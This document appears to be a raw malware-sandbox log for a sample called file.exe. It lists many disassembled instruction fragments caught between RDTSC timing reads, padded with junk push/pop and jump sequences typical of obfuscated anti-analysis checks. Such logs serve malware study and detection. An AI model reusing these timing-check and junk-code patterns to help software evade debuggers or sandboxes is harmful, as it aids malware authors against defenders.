Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95E1F6 second address: 95E269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63878h 0x00000009 popad 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e sub ecx, 6561CE89h 0x00000014 mov ebx, dword ptr [ebp+1248F3D3h] 0x0000001a mov edx, dword ptr [ebp+122D36B5h] 0x00000020 add eax, ebx 0x00000022 push 00000000h 0x00000024 push edx 0x00000025 call 00007F02BCD63868h 0x0000002a pop edx 0x0000002b mov dword ptr [esp+04h], edx 0x0000002f add dword ptr [esp+04h], 00000016h 0x00000037 inc edx 0x00000038 push edx 0x00000039 ret 0x0000003a pop edx 0x0000003b ret 0x0000003c nop 0x0000003d pushad 0x0000003e jnc 00007F02BCD63868h 0x00000044 push eax 0x00000045 jnp 00007F02BCD63866h 0x0000004b pop eax 0x0000004c popad 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jnl 00007F02BCD63866h 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ABD56 second address: 9ABD6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pushad 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jnc 00007F02BD1AD2E6h 0x00000010 je 00007F02BD1AD2E6h 0x00000016 push eax 0x00000017 pop eax 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ABD6F second address: 9ABD74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC87D second address: 9AC881 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC881 second address: 9AC889 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC889 second address: 9AC893 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F02BD1AD2E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF35C second address: 9AF366 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F02BCD63866h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B4E3A second address: 9B4E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B4E3E second address: 9B4E42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B4F6C second address: 9B4F72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B53CF second address: 9B53EA instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F02BCD63875h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B67D5 second address: 9B67EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B67EA second address: 9B67EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6B24 second address: 9B6B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6B29 second address: 9B6B4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F02BCD6386Dh 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pop edi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB9E4 second address: 9BBA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2F7h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAAC5 second address: 9BAAC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BABFD second address: 9BAC16 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 jmp 00007F02BD1AD2EEh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAC16 second address: 9BAC3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007F02BCD63877h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d je 00007F02BCD6386Eh 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAC3F second address: 9BAC69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007F02BD1AD2EBh 0x0000000b jmp 00007F02BD1AD2F9h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAC69 second address: 9BAC6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAC6D second address: 9BAC75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BADDF second address: 9BAE04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F02BCD63866h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02BCD63878h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAE04 second address: 9BAE08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAFAB second address: 9BAFC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63875h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB4BA second address: 9BB4BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BB640 second address: 9BB65D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02BCD63879h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7D21 second address: 9C7D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7D25 second address: 9C7D2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6099 second address: 9C60AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2EEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6452 second address: 9C6463 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F02BCD63866h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6463 second address: 9C6468 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6468 second address: 9C6473 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F02BCD63866h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6473 second address: 9C64A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jno 00007F02BD1AD2F8h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F02BD1AD2ECh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C661E second address: 9C6622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C6622 second address: 9C663B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F02BD1AD2F1h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C663B second address: 9C664C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02BCD6386Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C674A second address: 9C6761 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F02BD1AD2E6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jno 00007F02BD1AD2E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7400 second address: 9C7407 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7407 second address: 9C7438 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EFh 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F02BD1AD2F9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7438 second address: 9C744E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BCD6386Bh 0x00000008 jc 00007F02BCD63866h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBE56 second address: 9CBE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBC53 second address: 9CBC67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD6386Dh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBC67 second address: 9CBC80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F02BD1AD2F5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBC80 second address: 9CBCAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63879h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F02BCD6386Eh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBCAF second address: 9CBCD7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007F02BD1AD2FEh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBCD7 second address: 9CBD09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BCD63879h 0x00000008 jmp 00007F02BCD6386Dh 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CBD09 second address: 9CBD0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D05EA second address: 9D05EF instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D05EF second address: 9D05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D05F5 second address: 9D05FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D0772 second address: 9D0780 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push esi 0x0000000c pop esi 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D0780 second address: 9D0790 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F02BCD6386Ah 0x00000008 push edx 0x00000009 pop edx 0x0000000a push esi 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D0790 second address: 9D0794 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D08D7 second address: 9D08DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E040F second address: 9E0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0413 second address: 9E0419 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0419 second address: 9E0424 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pushad 0x00000006 popad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0549 second address: 9E0560 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BCD63873h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0560 second address: 9E0574 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007F02BD1AD2E6h 0x0000000e jnl 00007F02BD1AD2E6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0574 second address: 9E05CE instructions: 0x00000000 rdtsc 0x00000002 jns 00007F02BCD63866h 0x00000008 jmp 00007F02BCD63875h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 jmp 00007F02BCD63870h 0x00000017 pop eax 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b jns 00007F02BCD6387Ch 0x00000021 jo 00007F02BCD63868h 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EB327 second address: 9EB33E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8709 second address: 9F8716 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F02BCD63866h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8716 second address: 9F8736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F02BD1AD2F6h 0x00000007 jnl 00007F02BD1AD2E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8736 second address: 9F873B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F873B second address: 9F8758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2EDh 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c push ebx 0x0000000d ja 00007F02BD1AD2E6h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8A3E second address: 9F8A44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8F8D second address: 9F8FA8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F02BD1AD2F2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8FA8 second address: 9F8FAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8FAD second address: 9F8FB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8FB4 second address: 9F8FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F02BCD63866h 0x0000000a jmp 00007F02BCD63872h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jo 00007F02BCD63866h 0x0000001c ja 00007F02BCD63866h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F8FE3 second address: 9F8FF5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F02BD1AD2ECh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FEB9C second address: 9FEBB0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F02BCD6386Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B1CB second address: A0B1D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B1D3 second address: A0B1E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F02BCD63866h 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B1E2 second address: A0B1E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B1E6 second address: A0B207 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F02BCD63872h 0x00000010 popad 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0B207 second address: A0B20F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C893 second address: A0C897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C897 second address: A0C8AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BD1AD2F1h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C8AE second address: A0C8EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BCD63871h 0x00000008 jnl 00007F02BCD63866h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F02BCD63876h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0C8EA second address: A0C8EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0686E second address: A06874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06874 second address: A0688A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F02BD1AD2F2h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0688A second address: A068E5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F02BCD63866h 0x00000009 push esi 0x0000000a pop esi 0x0000000b jne 00007F02BCD63866h 0x00000011 popad 0x00000012 jmp 00007F02BCD63872h 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push eax 0x0000001b jmp 00007F02BCD63870h 0x00000020 pop eax 0x00000021 jg 00007F02BCD6386Ch 0x00000027 jl 00007F02BCD63866h 0x0000002d push eax 0x0000002e push edx 0x0000002f jp 00007F02BCD63866h 0x00000035 jmp 00007F02BCD6386Eh 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A068E5 second address: A068EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19937 second address: A19952 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F02BCD63875h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19AEA second address: A19AFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F02BD1AD2EBh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A19AFE second address: A19B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F02BCD63870h 0x00000008 jmp 00007F02BCD63876h 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F02BCD6386Dh 0x00000018 jmp 00007F02BCD63875h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2A33D second address: A2A341 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A292DF second address: A292E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A2944E second address: A29452 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29582 second address: A29586 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A29586 second address: A29593 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
